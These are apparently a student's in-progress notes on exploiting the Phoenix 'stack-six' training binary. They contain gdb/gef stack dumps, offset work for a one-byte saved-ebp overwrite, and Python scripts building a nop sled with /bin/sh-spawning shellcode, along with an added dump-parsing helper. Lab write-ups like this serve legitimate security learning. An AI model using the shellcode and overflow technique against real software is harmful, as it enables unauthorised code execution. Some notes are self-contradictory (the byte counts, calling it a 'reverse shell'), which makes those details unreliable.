stack-six (in progress)
"The macro GREET is architecture dependent." In this case, GREET is defined as
"Welcome home, " which is 13 bytes
which is exactly 34 bytes long (including the space & not including the quotes)
env var:
export NAME=VALUE
payload:
13_Bytes_(GREET) + 128_Bytes_buffer(environment variable) + padding + ret_(jmp to shellcode in buffer)
----------- gdb ---------------
jump to nop sled addr = 0xffffd5b0
greet ret val = 0x0804865f
greet ret location = 0xffffd65c
we start writing from within buffer at address 0xffffd5d7
gef> p/d 0xffffd65c - 0xffffd5d7
$2 = 133
#0xffffd5b0
where we actually start writing to buffer 0xffffd5aa
the right greet ret addr is 0xffffd62c
-------------------------------
GNU nano 2.7.4 File: stack-six-exploit.py
import subprocess
import struct
import os
import sys
total_len = 133
payload = "\x90"*50 + "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\x$
payload += "A" * (total_len-len(payload))
payload += '\xb0\xd5\xff\xff'
#0xffffd5b0
#payload += struct.pack('<I',0xffffd5b0) # address to land us in the nop sled. Works in gdb
#payload += '\xb2\xd6\xff\xff' # +50 addr spaceses
sys.stdout.write(payload)
#os.environ['ExploitEducation'] = payload
#subprocess.call(['./stack-six'])
-------------------------------------------
start writing from 0xffffd5da
from where we start writing in buffer to the ret of greet is 130 buffer
with env of len 126 A's write to addr 0xffffd637
and main's ret to libc is to 0xf7f8f654
0x8048673 <main+104> mov ecx, DWORD PTR [ebp-0x4]
0x8048676 <main+107> leave
0x8048677 <main+108> lea esp, [ecx-0x4]
0x804867a <main+111> ret
$ecx : 0x99300804 once the bin crashes
then ecx-0x4 is loaded into esp
this means ebp must have been overwritten at some stage, let's try to find it
------ -- ---- -- esp
A: 0x 99 3008 04 8 bytes
B: 0x4 99 3008 7 bytes 0x4993004
so we have control of ecx
'C' => 0x43
our 127th byte, 'C', overwrites a byte of ebp at addr 0xffffd638
we are overwriting the LSB of ebp
as we control the LSB, which is one byte, we can change the range of future esp values by
(0x00 to 0xff] or (0 to 255]. 0x00 is null so we can't use it.
user@phoenix-amd64:/opt/phoenix/i486$ export ExploitEducation=$(python -c "print 'A'*126+'\x00'")
-bash: warning: command substitution: ignored null byte in input
so, is there anywhere useful to jump to within the range 0xffffd601 - 0xffffd6ff?
gef> x/1x $bp
0xffffd638: 0xffffd643
gef> x/64xw $sp
0xffffd5a0: 0x00000000 0xf7ffb1e0 0x00000049 0x636c6557
0xffffd5b0: 0x20656d6f 0x656d6f68 0x4141202c 0x41414141
0xffffd5c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd5d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd5e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd5f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd600: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd610: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd620: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd630: 0x41414141 0x41414141 0xffffd643 0x0804865f
0xffffd640: 0xffffdf11 0x00000000 0x00000000 0x00000000
0xffffd650: 0x00000000 0x00000000 0x00000000 0xffffdf11
0xffffd660: 0x00000000 0xffffd680 0xffffd6fc 0xf7f8f654
0xffffd670: 0xffffd6f4 0x00000001 0xffffd6fc 0xf7f8f654
0xffffd680: 0x00000001 0xffffd6f4 0xffffd6fc 0x00000008
0xffffd690: 0x00000011 0x00000000 0xf7f8f628 0xf7ffb000
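Crash-triage helper, added here as an example and not part of the original notes: it parses the gef x/64xw dump above (first ten rows embedded as sample input), finds the longest run of the 'A' fill, locates greet's return slot (assumed to hold 0x0804865f as shown) and the saved ebp just below it, and reports how far the controlled bytes reached. The names ROW, parse_dump, longest_fill and triage are my own.

```python
import re
ROW = re.compile(r"^(0x[0-9a-f]+):\s+(.*)$")   # one gef 'x/Nxw' row: address, then words
# Constructed sample: the first ten rows of the "x/64xw $sp" dump quoted above.
DUMP = """\
0xffffd5a0: 0x00000000 0xf7ffb1e0 0x00000049 0x636c6557
0xffffd5b0: 0x20656d6f 0x656d6f68 0x4141202c 0x41414141
0xffffd5c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd5d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd5e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd5f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd600: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd610: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd620: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd630: 0x41414141 0x41414141 0xffffd643 0x0804865f
"""

def parse_dump(text):
    """Turn gef 'x/Nxw' rows into (base_address, bytes); each word is little-endian."""
    base, mem = None, bytearray()
    for m in (ROW.match(line.strip()) for line in text.splitlines()):
        if not m:
            continue
        addr = int(m.group(1), 16)
        base = addr if base is None else base
        if addr != base + len(mem):
            raise ValueError("dump is not contiguous at %#x" % addr)
        for word in m.group(2).split():
            mem += int(word, 16).to_bytes(4, "little")
    return base, bytes(mem)

def longest_fill(base, mem, fill=b"A"):
    """Longest run of the fill byte as (start_address, length); length 0 if absent."""
    runs = list(re.finditer(re.escape(fill) + b"+", mem))
    if not runs:
        return base, 0
    best = max(runs, key=lambda r: r.end() - r.start())
    return base + best.start(), best.end() - best.start()

def triage(text, ret_value):
    """Locate the saved ebp and return slot and measure how far the fill reached."""
    base, mem = parse_dump(text)
    fill_start, fill_len = longest_fill(base, mem)
    idx = mem.find(ret_value.to_bytes(4, "little"))
    if idx < 4:
        raise ValueError("return address not found after a saved-ebp slot")
    ret_at, ebp_at = base + idx, base + idx - 4
    saved_ebp = int.from_bytes(mem[idx - 4:idx], "little")
    return {"fill_start": fill_start, "fill_len": fill_len, "fill_end": fill_start + fill_len,
            "saved_ebp_at": ebp_at, "saved_ebp": saved_ebp, "saved_ebp_lsb": saved_ebp & 0xff,
            "ret_at": ret_at, "fill_to_ret": ret_at - fill_start}
```

On this dump the fill ends exactly at the saved ebp slot and the slot's low byte is 0x43, which is the 'C' that follows the 126 A's in the environment variable.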
looking at the env vars on the stack we find the following
0xffffdeb4: "COLUMNS=108"
0xffffdec0: "MAIL=/var/mail/user"
0xffffded4: "SHELL=/bin/bash"
0xffffdee4: "TERM=xterm-256color"
0xffffdef8: "SHLVL=1"
0xffffdf00: "ExploitEducation=", 'A' <repeats 126 times>, "C"
0xffffdf91: "LOGNAME=user"
0xffffdf9e: "PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games"
0xffffdfdc: "/opt/phoenix/i486/stack-six"
0xffffdff8: ""
it turns out we can't jump directly to the env as it's too far away, more than 2000 bytes away
that leaves the part of the stack that contains the overflowed buffer
well we can start writing bytes from 0xffffd601 to 0xffffd637 which is right up to ebp
the A's stop at 0xffffd637 and '\x09' is at
0xffffd605: 0x41414141 0x38414141 0x5b0afb70 0x00f7fb5a
gef> x/x $bp
0xffffd609: 0x38414141
gef> x/x $bp-4
0xffffd605: 0x41414141
$eax : 0x0
$ebx : 0x41414141 ("AAAA"?)
$ecx : 0x41414141 ("AAAA"?)
$edx : 0x0
$esp : 0xffffd60d → 0x5b0afb70
$ebp : 0x38414141 ("AAA8"?)
$esi : 0xffffd6f4 → 0xffffd819 → "/opt/phoenix/i486/stack-six"
$edi : 0x1
$eip : 0x08048677 → <main+108> lea esp, [ecx-0x4]
$eflags: [carry PARITY adjust zero SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
we now know we control ecx; now we just need to find which A's end up in ecx
gef> pattern create 126
[+] Generating a pattern of 126 bytes
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabga
[+] Saved as '$_gef0'
gef> pattern search $ecx 126
[+] Searching '$ecx'
[+] Found at offset 75 (little-endian search) likely
[+] Found at offset 74 (big-endian search)
gef>
the A's around where esp is are being overwritten, so we will have to jump to our env as it will always be intact, and it's located at 0xffffdf00
we can add a nop sled for easy targeting
Python exploit script
# Python 2 script: sys.stdout.write emits the str payload as raw bytes
import subprocess
import struct
import os
import sys
total_len = 127
shellcode = "\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
payload = "\x90"*(75-len(shellcode))   # nop sled padding shellcode out to offset 75 (from 'pattern search $ecx')
payload += shellcode
payload += "\x01\xdf\xff\xff"          # 0xffffdf01 little-endian: the env var copy on the stack
payload += "A"*47 + "\x09"             # filler, then the one byte that overwrites the LSB of saved ebp
if len(payload) != 127:
    print "err not 127 bytes"
sys.stdout.write(payload)
0xffffdf01 as little-endian bytes: \x01 \xdf \xff \xff
jump to 0xffffdf20 to hit nop sled
TODO: Figure out why the nops of the nop sled are not being recognised as instructions and thus not giving a reverse shell